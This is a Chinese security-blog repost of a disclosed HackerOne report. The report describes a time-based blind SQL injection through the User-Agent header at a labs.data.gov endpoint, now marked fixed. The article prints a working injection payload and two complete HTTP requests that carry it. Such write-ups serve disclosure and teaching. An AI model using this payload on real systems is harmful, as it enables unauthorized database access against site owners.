专栏名称: TimelineSec
安全圈必备公众号之一!专注于最新漏洞复现!内含漏洞时间线工具靶场等干货!记录每一个漏洞,捕捉安全的每一瞬间!
目录
相关文章推荐
余杭发布  ·  省级未来乡村,余杭新增6个! ·  昨天  
杭州本地宝  ·  2025杭州元宵免费活动汇总! ·  昨天  
余杭时报  ·  3月1日起,退钱! ·  昨天  
杭州本地宝  ·  杭州9场舞龙表演时间、地点公布! ·  3 天前  
51好读  ›  专栏  ›  TimelineSec

HackerOne | HTTP头注入之User-Agent注入

TimelineSec  · 公众号  ·  · 2019-12-07 15:52

正文


漏洞信息


发现者:harisec

漏洞种类:SQL注入

危害等级:严重

漏洞状态:已修复



前言


Harisec在以下网站中发现一个SQL注入漏洞,注入的位置在User-Agent。

https://labs.data.gov/dashboard/datagov/csv_to_json



漏洞再现


Harisec使用了盲注的方式来确认该漏洞

例如:将User-Agent的值设置为


Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'


将导致服务器在25秒后响应

这里,我们看一下具体的数据包内容


GET /dashboard/datagov/csv_to_json HTTP/1.1Referer: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'X-Forwarded-For: 1X-Requested-With: XMLHttpRequestHost: labs.data.govConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*



服务器在 25秒 后响应,与User-Agent的值相同

将User-Agent的值改一下,改成9秒后响应


GET /dashboard/datagov/csv_to_json HTTP/1.1Referer: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(3*3),0))OR'X-Forwarded-For: 1X-Requested-With: XMLHttpRequestHost: labs.data.govConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*




漏洞影响


该漏洞可以使攻击者注入恶意的SQL语句。


HackerOne | GitLab中Wiki页面存储型XSS

HackerOne | 头像上传imagetragick命令执行







请到「今天看啥」查看全文